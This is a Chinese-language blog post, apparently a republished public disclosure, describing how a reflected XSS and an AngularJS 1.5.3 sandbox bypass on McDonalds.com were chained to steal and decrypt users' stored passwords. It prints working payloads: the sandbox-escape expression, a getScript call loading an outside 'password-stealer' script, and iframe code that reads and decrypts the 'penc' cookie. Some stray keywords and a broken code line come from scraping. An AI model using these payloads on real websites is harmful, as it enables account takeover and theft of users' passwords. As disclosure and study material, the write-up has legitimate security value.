重磅：利用麦当劳网站的漏洞获取用户密码

时间 2019-11-24

原文原文链接

导读	本文讲述了利用不安全的加密存储（Insecure_Cryptographic_Storage）漏洞和服务端反射型XSS漏洞，实现对麦当劳网站（McDonalds.com）注册用户的密码窃取，进一步测试，还可能获取到网站注册用户的更多信息。

POC-利用反射型XSS漏洞绕过AngularJS框架沙箱html

麦当劳网站McDonalds.com设置有一个搜索页面，该页面存在XSS反射型漏洞，能够返回搜索参数值，假设搜索参数q为***********-test-reflected-test-***********，对应连接：
https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********linux

则执行效果以下：
浏览器

麦当劳网站采用AngularJS框架，因此可使用特殊字符在搜索区域进行返回值尝试。经过更改搜索参数q为{{$id}}以后，发现返回值对应AngularJS范围内的对应ID数字9：安全

Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}cookie

AngularJS是一个流行的JavaScript框架，经过这个框架能够把表达式放在花括号中嵌入到页面中。例如，表达式1+2={{1+2}}将会获得1+2=3。其中括号中的表达式被执行了，这就意味着，若是服务端容许用户输入的参数中带有花括号，咱们就能够用Angular表达式来进行xss攻击。app

因为AngularJS工做在沙箱模式，因此使用参数{{alert(1)}}无任何返回信息，但这并不表明AngularJS沙箱没有漏洞。在 AngularJS1.6版本中，因为沙箱机制不能很好地起到安全防御目的，已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试，并给出了相应绕过执行命令。框架

在这里，咱们来看看McDonalds.com使用的AngularJS版本，经过在浏览器控制端输入angular.version命令：
xss

能够发现AngularJS为1.5.3版本，参照PortSwigger的测试，咱们选用函数

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

做为搜索参数，很惊喜，返回值以下：
源码分析

这就意味着，咱们能够利用绕过命令，对网站加载外部JS脚本文件，如构造以下命令：

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`

在内容安全策略（Content-Security-Policy）的提示下，第三方脚本文件被成功加载。

窃取密码

除此以外，我在麦当劳网站的注册页面发现了复选框“Remember my password”，一般来讲，这只有在用户登陆页面才存在，有点奇怪：

在该页面的源代码页面，包含了各类passowrd字段内容，甚至存在一个有趣的密码解密函数：

最危险的是,利用该解密函数代码居然能够实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密，居然成功了！

并且，经分析发现，Cookie值penc的存储期限是大大的一年！LOL!

另外，如下的源码分析显示，麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密，加密方式为3DES，其中加密参数key和iv都为通用，这意味着只须要获取到cookie值就能对密码解密：

因为AngularJS沙箱绕过方法只对charAt的join方法（charAt=[].join;$eval(‘x=alert(1)’)）有效，因此即便我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密，但最终老是由于getCookie失败而无效。只有当charAt(0) 不为空时，getCookie才有返回值：

最后，我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本，为了不脚本因AngularJS沙箱被绕过而被反复执行，因此，我用window.xssIsExecuted对其进行了显示控制，以下：

if (!window.xssIsExecuted) {
 
    window.xssIsExecuted = true;
 
    var iframe = $('网址'>'); $('body').append(iframe); iframe.on('load', function() { var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }

最终，配合如下AngularJS沙箱绕过命令，能够成功从cookie信息中对密码解密！

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}

遗憾的是，我曾屡次与麦当劳官方就此问题进行联系，可是他们居然都不回应！@#%￥&! ，因此我选择把此漏洞公开。

原文来自：http://www.tiejiang.org/16067.html

本文地址：http://www.linuxprobe.com/mcdonald-vulnerability-password.html